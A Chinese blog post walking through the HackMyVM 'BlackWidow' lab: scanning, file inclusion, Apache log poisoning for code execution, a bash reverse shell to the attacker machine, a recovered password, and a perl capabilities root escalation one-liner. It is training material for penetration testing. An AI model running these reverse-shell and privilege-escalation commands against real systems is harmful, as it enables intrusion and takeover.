BlackWidow靶场

最新推荐文章于 2024-07-24 08:30:35 发布
最新推荐文章于 2024-07-24 08:30:35 发布
阅读量692 收藏 11
点赞数 11
分类专栏: hackmyvm 文章标签: 网络 网络空间安全 内网渗透 WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136296879
版权
文章描述了使用KaliLinux进行主机发现、端口扫描(包括识别出ApacheRCE漏洞),并通过目录穿越和敏感信息查找发现LFI漏洞。进一步利用Apache日志实现远程代码执行,利用Perl的capabilities实现提权,最终获取root权限的过程。
摘要由CSDN通过智能技术生成

kali:192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

目标IP:192.168.223.153

端口扫描

nmap -sV -p- -A 192.168.223.153

22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs      3-4 (RPC #100003)
40703/tcp open  mountd   1-3 (RPC #100005)
41361/tcp open  nlockmgr 1-4 (RPC #100021)
57993/tcp open  mountd   1-3 (RPC #100005)
60003/tcp open  mountd   1-3 (RPC #100005)

先看web,只有一张图片

目录扫描

gobuster dir -u http://192.168.223.153 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

有个company目录,进入看看

源码里面有个php文件

上面提示文件还包含的参数是file

测试一下

目录穿越成功LFI

之前端口扫描的时候80端口是apache服务,那么可以利用apache日志包含来进行rce

apache2日志目录在/var/log/apache2/access.log

可以看到确实能读取日志文件

抓个包把Agent改成一句话

然后反弹个shell,注意get传参url编码

1=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%20%200%3E%261'

编码前1=bash -c 'bash -i >& /dev/tcp/192.168.223.128/4567  0>&1'

然后就是翻敏感信息

home下只有一个用户viper

在备份文件夹下面有个auth.log

找到viper的密码 ?V1p3r2020!?

成功连上

找到第一个flag

继续翻文件,翻了一圈没什么常规的提权手段,用工具linpeas.sh扫描

好像可以capabilities提权

是个perl程序

搜索相关exp

linux系统利用可执行文件的Capabilities实现权限提升_capabilities提权-CSDN博客

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

成功提升到root权限拿到flag

总结:1.apache日志包含RCE

        2.敏感信息查找

        3.capabilities perl提权

        

tao0845
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3150
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
浏览器辅助工具 BlackWidow v6.28
10-22
BlackWidow v6.28 是一款专为提升在线浏览体验而设计的高效离线浏览器辅助工具。这款软件的主要功能在于帮助用户便捷地下载并保存整个网站内容,以便在没有网络连接的情况下也能访问。其核心特性包括: 1. **多级...
VulnHub】【2023年07月18日】最新全部靶场详情(上)
惟忆
07-18 8825
【代码】【VulnHub】【2023年07月18日】最新全部靶场详情(上)
vulnhub靶场之Black-Widow-final
weixin_42478365的博客
05-02 1009
将一句话木马写入日志,并配合文件读取漏洞Getshell;Capabilities(perl)提权
黑寡妇(BlackWidow):一款智能网络监控与安全分析工具
gitblog_00016的博客
04-19 433
黑寡妇(BlackWidow):一款智能网络监控与安全分析工具 项目地址:https://gitcode.com/1N3/BlackWidow 项目简介 黑寡妇(BlackWidow) 是一个开源的网络安全扫描和监控工具,由开发者 1N3 创建。它使用Python编写,旨在帮助网络管理员、安全研究人员和普通用户识别潜在的安全漏洞和网络异常,从而提高网络防御能力。 技术分析 BlackWidow ...
黑寡妇优化算法(Black Widow Optimization Algorithm, BWOA)
qq_18823753的博客
10-26 3032
黑寡妇优化算法(Black Widow Optimization Algorithm, BWOA)是由Adria´n F. Peña-Delgado等人于2020年提出的,该作者也是跳蛛优化算法(Jumping Spider Optimization Algorithm, JSOA)的作者之一。BWOA通过模仿蜘蛛求偶时不同的运动策略,对搜索空间进行探索和开发。
【CodeForces】704 C. Black Widow 动态规划+模拟
weixin_34087307的博客
01-16 182
【题目】C. Black Widow 【题意】给定一个表达式,形式为(...)^(...)^......^(...)=1(n个括号),括号中为1~2个值取或。有m个变量,给出表达式的值为xi或 !xi,xi只能为0或1,求变量赋值使得表达式成立的方案数。每个变量至多出现两次。n,m<=10^5。 【算法】动态规划+模拟 【题解】每个括号视为一个点,对于同时出现在两个括号内的变量将两个点...
Black Widow CodeForces - 704C (dp)
weixin_30741653的博客
02-23 182
大意: 给定一个m个bool变量的方程, 求方程解的个数 给定方程的形式类似于这样 每个括号是一个子式, 每个子式里变量数不超过2, 每个变量出现次数不超过2, 方程右侧一直是1 转载于:https://www.cnblogs.com/uid001/p/10422137.html...
【智能优化算法】黑寡妇优化算法(Black Widow Optimization Algorithm,BWOA)
yuchunyu12的博客
05-10 434
黑寡妇优化算法(Black Widow Optimization Algorithm,BWOA)是期刊“”的智能优化算法。
Razer BlackWidow Lite 雷蛇黑寡妇轻量版键盘测评
yzhhz_2018的博客
11-29 1398
原文标题:Razer BlackWidow Lite Keyboard Review: Simple Looks, Great Key Feel 原文作者: Avram Piltch 译文出自:云子可信官方论坛 本文永久链接:https://bbs.cloudtrust.com.cn/thread-389-1-1.html 译者:云子可信汉化组 如今大多数台式机的标配是橡胶圆顶轴的键盘,如果您...
BlackWidow v6.28.zip
07-03
BlackWidow是一个非常不错的离线浏览程序。可以方便的设置下载的网站的级数,以及下载文件的类型。特别提供自动的压缩功能,可以使你节省不少硬盘空间。同时,它还提供一个管理数据库,可以使你快捷方便的找到所需...
blackwidow:仪表盘
05-24
https://blackwidow.surge.sh/examples/external_data.json https://blackwidow.surge.sh/examples/chartd.json https://blackwidow.surge.sh/examples/countdown.json 仪表板API 仪表板是一个由JSON对象描述的表格...
Python-BlackWidow基于Python的Web应用程序扫描程序
08-12
Python-BlackWidow是一个基于Python的Web应用程序扫描工具,专为安全研究人员和渗透测试人员设计,用于在目标网站上执行在线情报收集(OSINT)和模糊测试(Fuzzing)。这个工具的主要目的是帮助发现OWASP(开放网络...
BlackWidow - 基于Python的Web应用程序扫描程序-python
06-18
关于:BlackWidow 是一个基于 Python 的网络应用程序蜘蛛,用于从目标网站收集子域、URL、动态参数、电子邮件地址和电话号码。 该项目还包括 Inject-X 模糊器,用于扫描动态 URL 以查找常见的 OWASP 漏洞。 演示...
MarkTool之TCP服务端
最新发布
Qt学视觉
07-24 212
MarkTool之TCP服务端
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 793
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
网络编程套接字socket
安权_code的博客
07-23 899
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 884
DNS概述。
widow安装redis
07-15
要在Windows上安装Redis,您可以按照以下步骤进行操作: ... 2. 解压下载的Redis压缩包到您选择的目录,例如 `C:\Redis`。 3. 在Redis目录中找到 `redis.windows.conf` 文件,并将其重命名为 `redis.conf`。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值